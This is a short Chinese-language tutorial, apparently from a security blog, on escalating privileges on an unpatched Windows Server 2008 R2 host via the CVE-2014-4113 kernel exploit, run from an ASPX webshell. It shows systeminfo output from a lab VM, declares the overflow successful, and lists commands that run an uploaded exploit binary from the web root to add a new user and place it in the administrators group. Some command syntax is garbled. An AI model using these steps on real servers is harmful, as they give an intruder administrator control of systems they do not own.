摘要

1、简介

在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。

如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。

2、CVE-2014-4113-Exploit

这个版本的提权工具 可以对winserver2008 的系统进行溢出提权

3、实战

systeminfo 这个命令查看系统信息的

主机名:          WIN-HRKJ54V1GSJ

OS 名称:         Microsoft Windows Web Server 2008 R2

OS 版本:         6.1.7601 Service Pack 1 Build 7601

OS 制造商:        MicrosoftCorporation

OS 配置:          独立服务器

OS 构件类型:     Multiprocessor Free

注册的所有人:    Windows 用户

注册的组织:

产品 ID:         00500-001-0000635-84743

初始安装日期:    2019/3/3, 16:24:34

系统启动时间:    2019/4/7, 17:14:40

系统制造商:      VMware, Inc.

系统型号:        VMware7,1

系统类型:        x64-based PC

处理器:          安装了 2 个处理器。

[01]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

[02]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz

BIOS 版本:        VMware, Inc.VMW71.00V.6997262.B64.1710270607, 2017/10/27

Windows 目录:     C:\Windows

系统目录:        C:\Windows\system32

启动设备:        \Device\HarddiskVolume1

系统区域设置:    zh-cn;中文(中国)

输入法区域设置:  zh-cn;中文(中国)

时区:            (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐

物理内存总量:    4,095 MB

可用的物理内存:  2,939 MB

虚拟内存: 最大值: 8,188 MB

虚拟内存: 可用:   6,603 MB

虚拟内存: 使用中: 1,585 MB

页面文件位置:    C:\pagefile.sys

域:               WORKGROUP

登录服务器:      暂缺

修补程序:        安装了 2 个修补程序。

[01]: KB2999226

[02]: KB976902

网卡:            安装了 1 个 NIC。

[01]: Intel(R) 82574L GigabitNetwork Connection

连接名:      本地连接

启用 DHCP:   否

IP 地址

[01]: 192.168.0.105

[02]:fe80::986d:3564:19ad:2447

溢出成功

如果找不到可写目录 可以 使用遍历可写目录的脚本进行查找

增加用户

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net moonsec moonsec /add"

增加到用户组

/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net localgroup administratorsmoonsec /add"

您可以选择一种方式赞助本站支付宝转账赞助

分享到各大网站